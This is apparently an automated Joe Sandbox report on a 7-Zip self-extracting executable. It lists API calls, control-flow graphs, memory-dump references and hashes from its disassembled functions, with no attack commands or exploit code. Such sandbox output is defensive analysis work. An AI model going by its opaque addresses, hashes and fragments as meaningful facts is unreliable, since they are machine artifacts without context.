                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?,?), ref: 00406301
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?), ref: 00406307
                                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 00406343
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?), ref: 0040636D
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000011,00000000,00000000,?,?,?,?,?,?,00000000,?,?,?), ref: 004063E6
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?), ref: 0040643D
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000,?,?,?), ref: 00406445
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,?,?,?), ref: 0040644D
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,?,?,?), ref: 00406455
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 0040646A
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 0040647B
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 00406483
                                                                                                                                                                                                                                                • MessageBoxA.USER32(00000000,Sorry, this program requires Microsoft Windows 2000 or later.,7-Zip SFX,00000010), ref: 0040649C
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ??3@$lstrlen$Message$_wtol$??2@FileFormatHandleModuleTimerlstrcpymemcmpwsprintf$AttributesCallbackCloseCommandCreateCurrentDirectoryDispatchDispatcherErrorExecuteFreeInitializeKillLastLineLocalNameObjectShellSingleStateUserVersionWaitWindow_wcsnicmpmemmovememsetwvsprintf
                                                                                                                                                                                                                                                • String ID: 4AA$4DA$7-Zip SFX$7ZipSfx.%03x$7zSfxString%d$;!@Install@!UTF-8!$;!@InstallEnd@!$@DA$AutoInstall$BeginPrompt$Delete$ExecuteFile$ExecuteParameters$FinishMessage$GUIFlags$GUIMode$HelpText$InstallPath$MiscFlags$OverwriteMode$RunProgram$SelfDelete$SetEnvironment$Shortcut$Sorry, this program requires Microsoft Windows 2000 or later.$XpA$amd64$del$forcenowait$hidcon$i386$nowait$setup.exe$sfxconfig$sfxversion$shc$x64$x86$IA
                                                                                                                                                                                                                                                • API String ID: 154539431-3058303289
                                                                                                                                                                                                                                                • Opcode ID: 926e16e0d72d3398af4091c0d2fb4f0e89ce66b1218389f87f1cbe10f28a7287
                                                                                                                                                                                                                                                • Instruction ID: bd55e9a5e2f2b8c77b34d16bce6880ff8bafa7c96c93ceffa7f521d25999041e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 926e16e0d72d3398af4091c0d2fb4f0e89ce66b1218389f87f1cbe10f28a7287
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 65C2E231904619AADF21AF61DC45AEF3769EF00708F54403BF906B61E2EB7C9981CB5D
                                                                                                                                                                                                                                                Function 00401626 Relevance: 22.8, APIs: 15, Instructions: 304COMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 651 401626-401636 652 401642-40166d call 40874d call 40a62f 651->652 653 401638-40163d 651->653 658 401680-40168c call 401411 652->658 659 40166f 652->659 654 401980-401983 653->654 665 401962-40197d ??3@YAXPAX@Z call 40eca9 658->665 666 401692-401697 658->666 660 401671-40167b call 40eca9 659->660 667 40197f 660->667 665->667 666->665 668 40169d-4016d3 call 401329 call 401454 call 401362 ??3@YAXPAX@Z 666->668 667->654 678 401948-40194b 668->678 679 4016d9-4016f8 668->679 680 40194d-401960 ??3@YAXPAX@Z call 40eca9 678->680 683 401713-401717 679->683 684 4016fa-40170e call 40eca9 ??3@YAXPAX@Z 679->684 680->667 687 401719-40171c 683->687 688 40171e-401723 683->688 684->660 690 40174b-401762 687->690 691 401745-401748 688->691 692 401725 688->692 690->684 695 401764-401787 690->695 691->690 693 401727-40172d 692->693 697 40172f-401740 call 40eca9 ??3@YAXPAX@Z 693->697 701 4017a2-4017a8 695->701 702 401789-40179d call 40eca9 ??3@YAXPAX@Z 695->702 697->660 704 4017c4-4017d6 GetLocalTime SystemTimeToFileTime 701->704 705 4017aa-4017ad 701->705 702->660 706 4017dc-4017df 704->706 708 4017b6-4017c2 705->708 709 4017af-4017b1 705->709 710 4017e1-4017eb call 403354 706->710 711 4017f8-4017ff call 40301a 706->711 708->706 709->693 710->697 716 4017f1-4017f3 710->716 715 401804-401809 711->715 717 401934-401943 GetLastError 715->717 718 40180f-401812 715->718 716->693 717->678 719 401818-401822 ??2@YAPAXI@Z 718->719 720 40192a-40192d 718->720 722 401833 719->722 723 401824-401831 719->723 720->717 724 401835-401859 call 4010e2 call 40db53 722->724 723->724 729 40190f-401928 call 408726 call 40eca9 724->729 730 40185f-40187d GetLastError call 4012f7 call 402d5a 724->730 729->680 739 4018ba-4018cf call 403354 730->739 740 40187f-401886 730->740 744 4018d1-4018d9 739->744 745 4018db-4018f3 call 40db53 739->745 743 40188a-40189a ??3@YAXPAX@Z 740->743 746 4018a2-4018b5 call 40eca9 ??3@YAXPAX@Z 743->746 747 40189c-40189e 743->747 744->743 753 4018f5-401904 GetLastError 745->753 754 401906-40190e ??3@YAXPAX@Z 745->754 746->660 747->746 753->743 754->729
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: bc4e185761910bab2b3e9b4b194fe0f2484e14367d7febfa53cbc10b96610557
                                                                                                                                                                                                                                                • Instruction ID: 8ae67fe93764504dd4472983a8ee98937692ca3eac7777145cc28303e79798ac
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bc4e185761910bab2b3e9b4b194fe0f2484e14367d7febfa53cbc10b96610557
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8DB17C71900205EFCB14EFA5D8849AEB7B5FF44304B24842BF512BB2F1EB39A945CB58
                                                                                                                                                                                                                                                Function 0040301A Relevance: 7.5, APIs: 5, Instructions: 45COMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 1082 40301a-403031 GetFileAttributesW 1083 403033-403035 1082->1083 1084 403037-403039 1082->1084 1085 403090-403092 1083->1085 1086 403048-40304f 1084->1086 1087 40303b-403046 SetLastError 1084->1087 1088 403051-403058 call 402fed 1086->1088 1089 40305a-40305d 1086->1089 1087->1085 1088->1085 1091 40308d-40308f 1089->1091 1092 40305f-403070 FindFirstFileW 1089->1092 1091->1085 1092->1088 1094 403072-40308b FindClose CompareFileTime 1092->1094 1094->1088 1094->1091
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetFileAttributesW.KERNELBASE(?,-00000001), ref: 00403028
                                                                                                                                                                                                                                                • SetLastError.KERNEL32(00000010), ref: 0040303D
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AttributesErrorFileLast
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1799206407-0
                                                                                                                                                                                                                                                • Opcode ID: 611e1059d124648bfa8909f45edfa8144be0e8992cd1f43fa13480e02f084d79
                                                                                                                                                                                                                                                • Instruction ID: 32a2c072cbeca167af0ba40feded167abd8377b8b15159977275e4e23b0806bf
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 611e1059d124648bfa8909f45edfa8144be0e8992cd1f43fa13480e02f084d79
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 42018B30102004AADF206F749C4CAAB3BACAB0136BF108632F621F11D8D738DB46965E
                                                                                                                                                                                                                                                Function 0040118A Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetDiskFreeSpaceExW.KERNELBASE(?,00000000,00000000), ref: 004011A6
                                                                                                                                                                                                                                                • SendMessageW.USER32(00008001,00000000,?), ref: 004011FF
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: DiskFreeMessageSendSpace
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 696007252-0
                                                                                                                                                                                                                                                • Opcode ID: 3a86173e64e6b0f12d7b84feb59694df1deaa45c142369f31f6b7a0286f107e3
                                                                                                                                                                                                                                                • Instruction ID: 9edb1a80411cac00ba33afe52a6c86c35bfa08927eae57e7515b94cd88b359ae
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3a86173e64e6b0f12d7b84feb59694df1deaa45c142369f31f6b7a0286f107e3
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1C014B30654209ABEB18EB90DD85F9A3BE9EB05704F108436F611F91F0CB79BA408B1D
                                                                                                                                                                                                                                                Function 00411DEF Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 111COMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 757 411def-411e64 __set_app_type __p__fmode __p__commode call 411f7b 760 411e72-411ec9 call 411f66 _initterm __getmainargs _initterm 757->760 761 411e66-411e71 __setusermatherr 757->761 764 411f05-411f08 760->764 765 411ecb-411ed3 760->765 761->760 766 411ee2-411ee6 764->766 767 411f0a-411f0e 764->767 768 411ed5-411ed7 765->768 769 411ed9-411edc 765->769 770 411ee8-411eea 766->770 771 411eec-411efd GetStartupInfoA 766->771 767->764 768->765 768->769 769->766 772 411ede-411edf 769->772 770->771 770->772 773 411f10-411f12 771->773 774 411eff-411f03 771->774 772->766 775 411f13-411f40 GetModuleHandleA call 4064af exit _XcptFilter 773->775 774->775
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                                                                                                                                                                                                                                • String ID: HpA
                                                                                                                                                                                                                                                • API String ID: 801014965-2938899866
                                                                                                                                                                                                                                                • Opcode ID: 9fb10d9e3a65800a4f5e1ed226729125e22e54dc21e3b7cab0738d928573cc55
                                                                                                                                                                                                                                                • Instruction ID: 158ffaedae0d42993a529c42e252781da09b2560f8e529a8c548a3e081932a5e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9fb10d9e3a65800a4f5e1ed226729125e22e54dc21e3b7cab0738d928573cc55
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 254192B0944344AFDB20DFA4DC45AEA7BB8FB09711F20452FFA51973A1D7784981CB58
                                                                                                                                                                                                                                                Function 00401B37 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 47timewindowCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B43
                                                                                                                                                                                                                                                • CreateWindowExW.USER32(00000000,Static,0041335C,00000000,000000F6,000000F6,00000005,00000005,00000000,00000000,00000000), ref: 00401B60
                                                                                                                                                                                                                                                • SetTimer.USER32(00000000,00000001,00000001,00000000), ref: 00401B72
                                                                                                                                                                                                                                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00401B7F
                                                                                                                                                                                                                                                • DispatchMessageW.USER32(?), ref: 00401B89
                                                                                                                                                                                                                                                • KillTimer.USER32(00000000,00000001,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B92
                                                                                                                                                                                                                                                • KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B99
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: MessageTimer$CallbackCreateDispatchDispatcherHandleKillModuleUserWindow
                                                                                                                                                                                                                                                • String ID: Static
                                                                                                                                                                                                                                                • API String ID: 2479445380-2272013587
                                                                                                                                                                                                                                                • Opcode ID: 3628b680e9888d51f3ede5b7fd431ea4f93bb964a28f818be4a598c22db00f11
                                                                                                                                                                                                                                                • Instruction ID: f02a6d563a0a994406544e3b77250aae51f77c8b940714b819f60fd1d37dc764
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3628b680e9888d51f3ede5b7fd431ea4f93bb964a28f818be4a598c22db00f11
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 10F03C3250212476CA203FA69C4DEEF7E6CDB86BA2F008160B615A10D1DAB88241C6B9
                                                                                                                                                                                                                                                Function 0040B163 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 160COMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 781 40b163-40b183 call 40f0b6 784 40b2f6-40b2f9 781->784 785 40b189-40b190 call 40ac2d 781->785 788 40b192-40b194 785->788 789 40b199-40b1d6 call 40adc3 memcpy 785->789 788->784 792 40b1d9-40b1dd 789->792 793 40b202-40b221 792->793 794 40b1df-40b1f2 792->794 800 40b2a2 793->800 801 40b223-40b22b 793->801 795 40b297-40b2a0 ??3@YAXPAX@Z 794->795 796 40b1f8 794->796 799 40b2f4-40b2f5 795->799 796->793 797 40b1fa-40b1fc 796->797 797->793 797->795 799->784 802 40b2a4-40b2a5 800->802 803 40b2a7-40b2aa 801->803 804 40b22d-40b231 801->804 805 40b2ed-40b2f2 ??3@YAXPAX@Z 802->805 803->802 804->793 806 40b233-40b243 804->806 805->799 807 40b245 806->807 808 40b27a-40b292 memmove 806->808 809 40b254-40b258 807->809 808->792 810 40b25a 809->810 811 40b24c-40b24e 809->811 812 40b25c 810->812 811->812 813 40b250-40b251 811->813 812->808 814 40b25e-40b267 call 40ac2d 812->814 813->809 817 40b269-40b278 814->817 818 40b2ac-40b2e5 memcpy call 40dcfb 814->818 817->808 819 40b247-40b24a 817->819 820 40b2e8-40b2eb 818->820 819->809 820->805
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • memcpy.MSVCRT(00000000,?,0000001F,00010000), ref: 0040B1C5
                                                                                                                                                                                                                                                • memmove.MSVCRT(00000000,-000000C1,00000020,?,00010000), ref: 0040B289
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040B298
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ??3@memcpymemmove
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3549172513-3916222277
                                                                                                                                                                                                                                                • Opcode ID: 5bad17cc77e2d39d7f6897ae69eb46f7fe1422127806d73b42e5b41d987a673b
                                                                                                                                                                                                                                                • Instruction ID: 201babb0cc669d9fea5df8a163075e687156198648327345136f7fe875bf0058
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5bad17cc77e2d39d7f6897ae69eb46f7fe1422127806d73b42e5b41d987a673b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 495181B1A00205ABDF14DB95C889AAE7BB4EF49354F1441BAE905B7381D338DD81CB9D
                                                                                                                                                                                                                                                Function 00403354 Relevance: 10.6, APIs: 7, Instructions: 145stringtimeCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 822 403354-40337a lstrlenW call 4024fc 825 403385-403391 822->825 826 40337c-403380 call 40112b 822->826 828 403393-403397 825->828 829 403399-40339f 825->829 826->825 828->829 830 4033a2-4033a4 828->830 829->830 831 4033c8-4033d1 call 401986 830->831 834 4033d3-4033e6 GetSystemTimeAsFileTime GetFileAttributesW 831->834 835 4033b7-4033b9 831->835 838 4033e8-4033f6 call 40301a 834->838 839 4033ff-403408 call 401986 834->839 836 4033a6-4033ae 835->836 837 4033bb-4033bd 835->837 836->837 844 4033b0-4033b4 836->844 840 4033c3 837->840 841 403477-40347d 837->841 838->839 852 4033f8-4033fa 838->852 853 403419-40341b 839->853 854 40340a-403417 call 407776 839->854 840->831 848 4034a7-4034ba call 407776 ??3@YAXPAX@Z 841->848 849 40347f-40348a 841->849 844->837 845 4033b6 844->845 845->835 865 4034bc-4034c0 848->865 849->848 850 40348c-403490 849->850 850->848 856 403492-403497 850->856 860 40349c-4034a5 ??3@YAXPAX@Z 852->860 857 40346b-403475 ??3@YAXPAX@Z 853->857 858 40341d-40343c memcpy 853->858 854->852 856->848 862 403499-40349b 856->862 857->865 863 403451-403455 858->863 864 40343e 858->864 860->865 862->860 867 403440-403448 863->867 868 403457-403464 call 401986 863->868 866 403450 864->866 866->863 867->868 869 40344a-40344e 867->869 868->854 872 403466-403469 868->872 869->866 869->868 872->857 872->858
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(00404AC6,?,?,00000000,?,?,?,?,00404AC6,?), ref: 00403361
                                                                                                                                                                                                                                                • GetSystemTimeAsFileTime.KERNEL32(?,00404AC6,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?), ref: 004033D7
                                                                                                                                                                                                                                                • GetFileAttributesW.KERNELBASE(?,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 004033DE
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00404AC6,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?), ref: 0040349D
                                                                                                                                                                                                                                                  • Part of subcall function 0040112B: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 0040114B
                                                                                                                                                                                                                                                  • Part of subcall function 0040112B: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 00401171
                                                                                                                                                                                                                                                • memcpy.MSVCRT(-00000001,00404AC6,?,?,?,?,?,00404AC6,?), ref: 0040342F
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 0040346C
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000001,0000000C,00404AC6,00404AC6,?,?,?,?,00404AC6,?), ref: 004034B2
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ??3@$FileTime$??2@AttributesSystemlstrlenmemcpy
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 846840743-0
                                                                                                                                                                                                                                                • Opcode ID: 59d4a2ad1293f13bca9fbc2cc36a10c810479fd21a5ed498f46fbcb1fa619914
                                                                                                                                                                                                                                                • Instruction ID: c1b9adc2f16cc45d244a7c0b75b8b4a4f89234fa72cd4c12ee41ca3d86f3c48f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 59d4a2ad1293f13bca9fbc2cc36a10c810479fd21a5ed498f46fbcb1fa619914
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8F41C836904611AADB216F998881ABF7F6CEF40716F80403BED01B61D5DB3C9B4282DD
                                                                                                                                                                                                                                                Function 00404405 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 00401F47: GetUserDefaultUILanguage.KERNEL32(00404416,00000000,00000020,?), ref: 00401F51
                                                                                                                                                                                                                                                  • Part of subcall function 00401F9D: GetLastError.KERNEL32(00000000,00000020,?), ref: 00401FEC
                                                                                                                                                                                                                                                  • Part of subcall function 00401F9D: wsprintfW.USER32 ref: 00401FFD
                                                                                                                                                                                                                                                  • Part of subcall function 00401F9D: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 00402012
                                                                                                                                                                                                                                                  • Part of subcall function 00401F9D: GetLastError.KERNEL32 ref: 00402017
                                                                                                                                                                                                                                                  • Part of subcall function 00401F9D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00402032
